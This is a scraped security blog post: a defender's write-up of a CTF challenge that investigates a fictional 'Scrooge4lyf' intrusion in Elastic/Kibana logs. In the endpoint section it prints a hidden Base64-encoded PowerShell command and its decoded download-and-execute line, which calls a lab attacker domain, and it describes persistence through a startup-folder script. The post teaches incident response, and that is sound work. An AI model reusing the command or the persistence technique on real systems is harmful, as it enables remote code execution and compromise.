# FDCA JuleCTF Challenge 13 – Write Up - Saga Security
## So now the dust has settled on the awesome CTF that was run by the crew over at FDCA, where I got to work on a number of challenges. I figured it was time to do a write up of the challenges in case anyone is still wondering how to complete them. I wrote two
## Information:

+ Link: https://www.sagasecurity.dk/fdca-julectf-challenge-13-write-up/
+ Source: Saga Security
+ Author: David Thejl-Clayton
+ Date published: 07 January 2023, 21:58
+ Date scraped: 07 January 2023, 23:00

## Article:
![Main article image](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2022/11/Saga-security-white.png?media=1669405758)


So now the dust has settled on the awesome CTF that was run by the crew over at FDCA, where I got to work on a number of challenges. I figured it was time to do a write up of the challenges in case anyone is still wondering how to complete them.


I wrote two challenges for the CTF, with each challenge having two parts. I have another post coming straight up featuring the write up from Challenge 14. But this post will focus on both parts of Challenge 13.


## Challenge 13 setup


You can read about the setup and some of my reflections regarding the challenges on my blog post here: <https://www.sagasecurity.dk/fdca-julectf-challenge-13-and-14-write-up-intro/>


## Challenge 13 Part 1


So for part 1 of the challenge, the goal was to use the open source application OSINTer, to find the relevant information about the “Scrooge4lyf” threat actor. For those of you who don’t know about OSINTer, I suggest you take a look over at <https://osinter.dk/> where my good friend and mentee Bertram Madsen has created an incredible application for correlating and collecting lots of different sources of cyber threat intelligence in one place.


I chose to add this step into the challenge because as blue teamer’s we are often overloaded with information coming in from all sorts of different sites, and trying to keep track of all of this information is very difficult. I have seen people have hundreds of saved tabs in their browser, or receive tonnes of emails which they then need to correlate into various email folders to try to keep up with whats happening. OSINTer was written to solve exactly this problem and it is a tool that many of us in the Danish cyber security scene are using. It is also supplying a feed of articles into the well know VSEC Discord community.


From OSINTer the challenge was to then find the relevant article about “Scrooge4lyf” and then begin to read up about the threat actor and begin to form a picture of the TTP’s that the participants might expect to encounter within their investigations. With this knowledge onboard it was time for the participants to perform some incident response investigation against a recent “Scrooge4lyf” attack.


## The investigation


Elastic was kind enough to sponsor an instance of Elastic Cloud for these two challenges within the CTF. The participants were given a login to Elastic Cloud, where they would find a huge amount of logs and events from an organisation which had recently been targeted by “Scrooge4lyf”. The Elastic Cloud instance had nearly all of its fancy security features turned off, as this would have made it far too easy for the participants. So all SIEM rules were turned off and all fancy additional alerting was also disabled.


However the participants were not restricted from running the SIEM rules themselves against the logs, so this could have been a nice shortcut if anyone attempted that.


The question posed to the participants in part 1 of the challenge was: ***“Which domain was contacted when the user opened the phishing email?”***


There are quite a few ways to begin an investigation like this and get to the answer, so I will document one of the ways that I would approach this investigation.


The first thing is to establish a timeframe for when the attack occurred, when faced with so many log entries.


1. Head over to “Analytics” and then “Discover” within Kibana.
2. Check that the “Data view” is set to “logs-\*” this will mean that you include all log sources which match this wildcard.
3. Set the timeframe to “Last 6 months”.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-06-at-22.24.40-1024x215.png?media=1669405758)


The screenshot above, is the result of those steps. As you can see there appears to be quite a large amount of activity in the month of December. Which matches up with our cyber threat intelligence gathered from the blog posts regarding when “Scrooge4lyf” tends to be active.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-06-at-22.28.53-1024x123.png?media=1669405758)


Zooming in a little more into the month of December we can see the screenshot above, which tells us that there was a quiet period from December 6th right up until December 11th, when it appears that there is quite a big jump in the number of log events right through until December 16th when it drops off again.


So now we have a rough timeframe for the intrusion, December 11th to December 16th. So all of our investigation work will be focused in this specific area.


Now we could choose to go a couple of different ways to investigate, we could focus on the endpoints and look at the initial infection vector, or we could choose to look at the network traffic in this timeframe. Both would potentially have clues regarding the domain being contacted.


## Endpoint investigation


From our CTI source we know that “Scrooge4lyf” is very fond of Powershell and has utilized this as their initial payload when phishing users in organizations. We are very lucky in this organization as it appears that some level of Powershell logging has been enabled on a number of endpoints.


This is the field that we can filter the logs to give us only events from the Windows Powershell Operational Logs, we could also choose the “event provider” as Powershell. This would give the same result in filtering.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-06-at-22.41.59-1024x78.png?media=1669405758)


When applying this as a filter to our logs, the number of entries drops from 900,000+ to only 485 hits.


This is definitely much easier for us to work with, and the next thing that I do is find the field called “process.args” as this will likely show me if any Powershell scripts are being executed and if so how are they being executed.


Without even needing to scroll a little bit through the log events, I immediately see something that looks very suspicious.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-06-at-22.53.07-1024x130.png?media=1669405758)


For those who want to play along at home here is the text from the image above so you can copy and paste it to do your own investigation.



```
powershell, -Sta, -Nop, -Window, Hidden, -EncodedCommand, aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBjAHIAbwBvAGcAZQA0AGwAeQBmAC4AagB1AGwAZQBsAHUAbAB6AC4AZABrADoAOAAwADAAMgAvAFUAQQBDAC4AcABzADEAJwApAA==
```

For those who aren’t quite clear about what this is. This is an encoded Powershell command which more often than not indicates something worth taking a closer look into. The command has been encoded using Base64 and this has been done in an attempt to obfuscate the command from detection capabilities.


What we need to do next is to take the encoded command and decode it from Base64 into something we can read ourselves. To do this, we can use a tool called Cyberchef. <https://gchq.github.io/CyberChef/>


1. Drag and drop “From Base64” into the “Recipe” section within Cyberchef.
2. Paste the encoded command into the “Input” section of Cyberchef.
3. Click on “Bake”.
4. Witness as Cyberchef performs magic and decodes the command for us and spits it out in the “Output” section.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-06-at-23.05.00-1024x532.png?media=1669405758)


As you can see the result is a little choppy as a number of full stops have been added in between each character. This is again for extra obfuscation from detection engines.


When removing these full stop characters, we can see:



```
iex (New-Object  Net.WebClient).DownloadString('http://scrooge4lyf[.]julelulz[.]dk:8002/UAC.ps1')
```

This also gives us the answer to part 1 of the challenge the domain was **“scrooge4lyf[.]julelulz[.]dk”** (I have added the [] to defang the domain to prevent any accidental visiting of malicious domains).


Now we could move onto to part 2, but we are having so much fun that we could also look at how we would have found this domain via performing some network analysis.


## Network Investigation


Another obvious place to look for this domain would be if we had access to any sort of network logging. If we for example logged DNS requests we could look at those logs and hopefully find something that sticks out.


Now it is very much worth noting here that the environment in which this attack was performed, was within a lab. This means that there is not the usual level of background noise that you would find within a normal organisation and so it is going to be easier to spot domains that stick out in the lab since it is such a clinical environment.


One way to do this within a proper organisation would be to use some sort of machine learning against the logs to look for anomalous domain names, which would potentially flag the suspicious phishing domain, especially if it was being utilized for C2 traffic.


So lets take a look at some network traffic shall we, and see what we can find!


When we look back at our CTI source, we can read that “Scrooge4lyf” like to utilize the open source C2 tool “Covenant”. They have also been seen to use DNS beaconing in the past, so this is something we could look for.


The first thing I would do in this situation is take a look at our network logs to see if we can find any IP addresses or domains where there is a large amount of events towards within the timeframe for our attack. This could give us a bit of a leg up in locating the suspicious domain name.


One of the awesome things with Elastic, is that the Security area of the platform features some dashboards where it is possible to get an overview of Users, Hosts and Network events, with some nice visualisations as part of these dashboards to make it easier to understand and interpret the data.


1. Navigate to the Security area of Kibana and click on “Explore”.
2. Click on “Network” and be presented with the “Network” dashboard.
3. Now we can look at some of the tables in this dashboard and look for interesting things.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-20.43.00-1024x599.png?media=1669405758)


When looking at the top 4 destination IP addresses being visited within our organisation, we can do some research into each one to see if anything here immediately sticks out as strange.


The first IP address in this table, when we do some research into it within Kibana. We can see that this IP belongs to Microsoft and that the processes within our organization that are contacting this IP address are the Elastic Agent.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-21.00.04-1024x111.png?media=1669405758)


So basically this IP address is where our Elastic Cloud instance is being hosted, and this is where our Elastic Agent is shipping logs to.


Lets rule out this IP address and look further through the next IP’s. Lets ignore the 127.0.0.1 as it is our localhost address.


Next up we have 192.168.2.3, which is our domain controller within our environment where we expect there to be quite a lot of traffic towards within our organisation. When looking into the processes contacting this destination IP, it is incredibly varied. There is also a number of Kerberos authentication requests and successes within the events, again indicating we are seeing a domain controller. When we look at the reverse DNS name for this host we find that it is our domain controller, “Zidane-SagaLab”.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-21.16.54-1024x252.png?media=1669405758)


Next up in the top most visited table is another internal IP address, 192.168.2.8. Now before we rule out all internal IP addresses, because surely attackers would always be using external IP addresses for their C2 wouldn’t they? What if this is exactly what the attacker wants you to do? What if instead they have already compromised an internal host and are using this to host their C2 communication to appear like legitimate traffic and fool the Blue team into ignoring this traffic?


Lets take a look at 192.168.2.8… Which process is responsible for visiting this destination IP?


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-21.19.17-1024x64.png?media=1669405758)


Wait what? Is there any other process contacting this IP?


Nope.


There is definitely something suspicious going on here, lets take a look at exactly what Powershell is communicating with then it is contacting this IP address.


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-21.21.19.png?media=1669405758)


Bingo we have found our attacker and our domain: **“scrooge4lyf[.]julelulz[.]dk”** 


According to our challenge, this was the end of that investigation. But in a real life incident response situation, one of the next steps would be to understand whether this domain was simply the domain used to host a malicious payload or whether there is also active C2 communication occurring towards this domain. This could be done by checking the number of log events where this domain or IP address is present and also looking at the gap between the events to see if there is a pattern of C2.


Lets take a quick look as bonus in this writeup…


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-21.26.37-1024x519.png?media=1669405758)


Whoa yep, we are dealing with the C2 domain/ip address. You can see that the events are spaced out by approximately 3 seconds and when looking across the entire timeframe for our attack, this pattern is exactly the same. This attacker is incredibly noisy! In a real life incident response situation, you would probably not expect to find an attacker making so much noise as this. Especially creating a pattern like this with the 3 second gap per event, with modern day C2 frameworks providing features like jitter to prevent this type of pattern forming and giving the Blue team more of a headache in locating the C2 traffic.


This concludes our investigation for Part 1, there is of course many more ways we could have done these investigations. We could have also used some of the really cool machine learning built into Elastic, or some of the funky visualisations, or some of the nice SIEM rules. But given that these challenges were designed with a beginner audience in mind, we will keep the solutions as simple as possible.


## Challenge 13 – Part 2


Part 2 for this challenge is a little more straight forward since we solved quite a lot of the investigation work in Part 1.


Our question was ***“Scrooge4lyf has initiated persistance somehow onto a host, what is the name of this persistance file?”***


In Part 1 we were able to ascertain that the domain name being contacted was **“scrooge4lyf[.]julelulz[.]dk”** so we can use this to look forward through more of the actions that the attacker performed within the environment. We were also able to confirm in our Network investigation that this domain was also utilized for our C2, so it is likely that we will find the persistence mechanism tied up to this domain.


Lets take a look!


If we go back to Discover and look at the Powershell datastream again, we can choose to exclude the events featuring the malicious encoded Powershell as this is being utilized for the C2 beaconing but what we want to find right now is other commands or the results of other commands being run in our organization.


With these events excluded within our original attacker timeframe, we drop from around 500+ events to look through, to only 100 events.


This is great, but we need a little more of a leg up to help us find what we are looking for here, we could choose to simply scroll through the events looking at the process command line to look for signs of malicious activity or we could use the CTI we were provided via the blog post about “Scrooge4lyf” to help us.


In the CTI it says that “Scrooge4lyf” has been found to use living off the land techniques such as Scheduled Tasks and creating Startup Items. So we can use both of these as query terms to search through our log events to see if the attacker has used either techniques.


## Scheduled Tasks for persistence


When creating a Scheduled Task in Windows utilizing Powershell, the arguements you pass to Powershell include the term “ScheduledTask”, whether it is creating a new scheduled task “New-ScheduledTaskAction” or modifying existing ones. More can be found on this subject at this blog post: <https://www.windowscentral.com/how-create-scheduled-tasks-powershell-windows-10>


When working as an incident responder it is always useful to have a basic knowledge of Windows and Linux operating systems. This will make it easier for you when it comes to investigating examples like in this attack.


Now we can use a wildcard query within Elastic to filter and find in our Powershell events if there is any sign of the attacker creating or modifying Scheduled Tasks for their persistence. We simply search “\*ScheduledTask\*” as we know that this is the term being passed as an argument to Powershell. This query returns no results.


## Startup Items for persistence


When creating startup items for persistence utilizing Powershell, a file would need to be created and placed in the folder where Startup Items are located and executed. Utilizing this blog post: <https://www.shellhacks.com/windows-startup-folder-add-program-to-startup/> it is possible to find that this folder is located here:



```
C:\Users\<*UserName*>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```

So in order to see if “Scrooge4lyf” has created a Startup item for persistence, we should filter our Powershell logs for signs of this folder.


To do this we can make a very simple wildcard filter: “\*Startup\*”.


Sidenote: *Now I would not recommend that you use this wildcard filter without already having added the filters we already have in place for the datastream=Powershell. This is because wildcard queries can be quite intensive on searching and within a large organisation this might cause some latency when performing this type of search if you haven’t setup your filters correctly.*


![](https://usercontent.one/wp/www.sagasecurity.dk/wp-content/uploads/2023/01/Screenshot-2023-01-07-at-22.13.52.png?media=1669405758)


Bingo! We have a hit!


“Scrooge4lyf” has created a file called “**TotallySafeStartupPowershell.ps1**” and placed it in the Startup items folder for our “Ifrit” user.


This answers part 2 of our challenge and completes the whole of the challenge!


## Closing thoughts


I hope you enjoyed this challenge as much as I enjoyed creating it for you! I also hope you enjoyed reading through this writeup, it has been very fun to create this writeup too…


Stay tuned for the next write for Challenge 14.





## Tags:
***ipv4-adresses***: 127.0.0.1 192.168.2.3
***email-adresses***: alook@192.168.2.8
***urls***: http://scrooge4lyf.julelulz.dk:8002/UAC.ps1 https://www.shellhacks.com/windows-startup-folder-add-program-to-startup/ http://scrooge4lyf.julelulz.dk https://www.windowscentral.com/how-create-scheduled-tasks-powershell-windows-10 https://gchq.github.io/CyberChef/ https://www.sagasecurity.dk/fdca-julectf-challenge-13-and-14-write-up-intro/ https://osinter.dk/

### Autogenerated tags:
[[powershell]] [[ip]] [[scrooge4lyf”]] [[c2]] [[timeframe]] [[blog]] [[osinter]] [[cloud]] [[cti]] [[cyberchef]]
